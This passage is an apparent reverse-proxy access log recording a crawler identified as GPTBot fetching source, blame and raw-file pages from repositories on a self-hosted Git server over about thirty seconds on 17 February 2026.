"https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/letsencrypt-requests_access.log" -[17/Feb/2026:16:18:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11170] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9977] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9976] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 9975] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14056] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14055] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14054] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 2228] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14054] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" [Client 74.7.227.38] [Length 14054] [Gzip 7.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py?display=source" [Client 74.7.227.38] [Length 16199] [Gzip 5.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/watchdog.py" -[17/Feb/2026:16:18:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11170] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:18:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 13467] [Gzip 7.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/src-old/old_codec.cpp" -[17/Feb/2026:16:18:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169571] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:16:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md?display=source" [Client 74.7.227.38] [Length 169600] [Gzip 7.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/ReadMe.md" -[17/Feb/2026:16:18:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt?display=source" [Client 74.7.227.38] [Length 11168] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/BuildTip.txt" -[17/Feb/2026:16:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 11119] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument" -[17/Feb/2026:16:18:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/lib64?follow_symlink=1" [Client 74.7.227.38] [Length 11047] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv" -[17/Feb/2026:16:18:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py?display=rendered" [Client 74.7.227.38] [Length 10966] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/import_csv.py" -[17/Feb/2026:16:18:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?files=PostgresPatrol%2fbuild%2fPostgresPatrol%2fbase_library.zip" [Client 74.7.227.38] [Length 19763] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/build/PostgresPatrol/base_library.zip" -[17/Feb/2026:16:18:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=html" [Client 74.7.227.38] [Length 70781] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:16:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts?display=source" [Client 74.7.227.38] [Length 13184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/services/geminiService.ts" -[17/Feb/2026:16:18:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 9919] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" -[17/Feb/2026:16:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10357] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" -[17/Feb/2026:16:18:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 13453] [Gzip 4.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" -[17/Feb/2026:16:18:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" [Client 74.7.227.38] [Length 2227] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_codec.cpp" -[17/Feb/2026:16:18:50 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:16:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:16:18:51 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:16:18:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4843] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:16:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 973] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:16:18:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 74.7.227.38] [Length 19909] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/asset_pilot_docker.tar.gz" -[17/Feb/2026:16:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" [Client 74.7.227.38] [Length 10236] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/transport_error.hpp" -[17/Feb/2026:16:18:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/vendor_formats.hpp" [Client 74.7.227.38] [Length 12008] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" [Client 74.7.227.38] [Length 9951] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/data_format.hpp" -[17/Feb/2026:16:18:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/transport_state.hpp" [Client 74.7.227.38] [Length 11424] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include" -[17/Feb/2026:16:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" [Client 74.7.227.38] [Length 10147] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:18:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" [Client 74.7.227.38] [Length 16620] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/codec.cpp" [Client 74.7.227.38] [Length 17551] [Gzip 6.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:18:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/old_controller.cpp" [Client 74.7.227.38] [Length 15273] [Gzip 5.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:18:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/dummy.cpp" [Client 74.7.227.38] [Length 11165] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/modbus_tcp.cpp" [Client 74.7.227.38] [Length 18857] [Gzip 6.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src" -[17/Feb/2026:16:18:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 11162] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/build/CMakeFiles" -[17/Feb/2026:16:18:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" [Client 74.7.227.38] [Length 9985] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; 